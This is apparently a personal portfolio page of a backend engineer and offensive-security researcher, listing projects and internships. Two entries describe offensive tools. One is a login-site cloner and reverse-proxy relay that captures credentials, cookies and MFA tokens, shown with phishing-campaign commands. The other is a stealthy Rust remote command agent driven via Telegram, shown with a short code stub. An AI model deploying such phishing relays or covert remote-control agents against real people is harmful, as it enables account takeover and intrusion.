Backend Engineer
Cybersecurity Researcher

Build Break Repeat

noob_for_hire
Welcome! Type help for available commands.
$
01

About

Hello, I'm Mubarak.
I'm a backend engineer and cybersecurity researcher, specializing in OffSec.
I'm passionate about scripting and generally making and breaking systems with Python, Django, and FastAPI.
I also like to play Minecraft and tinker around with stuff.

Mubarak - Professional Headshot
Mubarak - Minecraft Art Style
Mubarak - Hacker Atmosphere
just finished a presentation, felt kinda cool
me if i was in minecraft
smart monke activities lmao
02

Selected Projects

2025

LazyHooks

Python / Webhooks

LazyHooks

The easy way to handle webhooks in Python. Includes automatic retries, signing, and verification. Built on asyncio and aiohttp for high performance.

Key Features

  • Simple API: Send webhooks with minimal boilerplate.
  • Async First: Built for high concurrency.
  • Secure: Built-in HMAC-SHA256 signing.
  • Reliable: SQLite persistence & automatic retries.
example.py
import asyncio
from lazyhooks import WebhookSender

async def main():
    sender = WebhookSender(signing_secret="super-secret")

    await sender.send("https://example.com/webhook", {
        "event": "user_signup",
        "user_id": 12345
    })

asyncio.run(main())

Tools Used

2025

Mirage

Python / Security

Mirage

A high-performance site cloner and reverse proxy relay for security simulation campaigns. Clones target sites recursively, injects credential capture hooks, and intercepts session cookies and MFA tokens in real time.

Key Features

  • Site Cloning: Async recursive crawler rewrites URLs and injects capture hooks.
  • Reverse Proxy Relay: MitM mode captures credentials, cookies, and MFA tokens live.
  • Campaign Management: CSV target import, templated emails, tracking pixels and click tracking.
  • Guardrails: Mandatory engagement ID, domain whitelist, and full JSON-lines audit log.
  • Reporting: Generate HTML or JSON reports with full engagement timeline.
terminal
# Initialize engagement with scoped domains
mirage init -e "ENG-2026-001" -d "login.target.com" -o "operator"

# Clone the login page
mirage clone -t https://login.target.com -o ./site

# Or use reverse proxy relay for real-time token capture
mirage proxy -t https://login.target.com -l 443 --ssl

# Run campaign and review results
mirage campaign send -n "Q1-Phish" --smtp smtp.relay.com
mirage report generate -n "Q1-Phish" --format html

Tools Used

2026

Miniature Engine

Python / FastAPI

Miniature Engine

An API analysis engine that processes web traffic to generate interactive routing graphs. Automatically infers request schemas, detects pagination, and compares graph versions to identify API drift.

Key Features

  • Traffic Ingestion: Ingests web traffic from JSON uploads, HAR file parsing, or live Playwright browser capturing.
  • Schema Inference: Automatically classifies request types, detects pagination patterns, and structures database schemas.
  • API Diffing: Compares graph baselines to identify added, removed, or modified routes and models.
  • Interactive Canvas: Visualizes API structures interactively using React Flow canvas node graphs.
terminal
# Ingest HAR file to build endpoint graph
curl -X POST http://localhost:8000/graph/build \
  -H "Content-Type: application/json" \
  -d @traffic.json

Tools Used

2026

Project Noruas

Rust / Security

Project Noruas

A remote command execution agent and relay framework built in Rust. Utilizes outbound WebSockets and a cloud proxy to route commands from a Telegram controller. Note: This project is not for public use as it is technically malware.

Key Features

  • Proxy Routing: Separates controllers, cloud relay routers, and local clients to proxy command traffic.
  • Optimized Footprint: Minimizes client executable size and strips debug symbols during compilation.
  • WebSocket Communications: Employs outbound WebSocket connections to communicate over standard web ports.
  • Stealth Execution: Suppresses default console windows to run silently in target environments.
main.rs
#![windows_subsystem = "windows"]

fn main() {
    let agent = NoruasAgent::new("https://relay.noruas.local");
    agent.start_websocket_loop();
}

Tools Used

Rust
03

Experience

Apr 2026 - Present

Backend and Security Research Intern

DocuHealth

  • Conducted backend vulnerability assessments and security audits to identify and mitigate critical system risks.
  • Researched and implemented governance, risk, and compliance (GRC) frameworks aligned with national and international healthtech standards.
  • Researched and drafted implementation plans for the FHIR HL7 standard to establish secure healthcare data interoperability.
Dec 2025 - Mar 2026

Backend Engineer Intern

Tweakrr

  • Built the payout system for the referral program.
  • Created logic to verify and qualify successful referrals.
  • Worked with a team to build core backend services for the platform.
04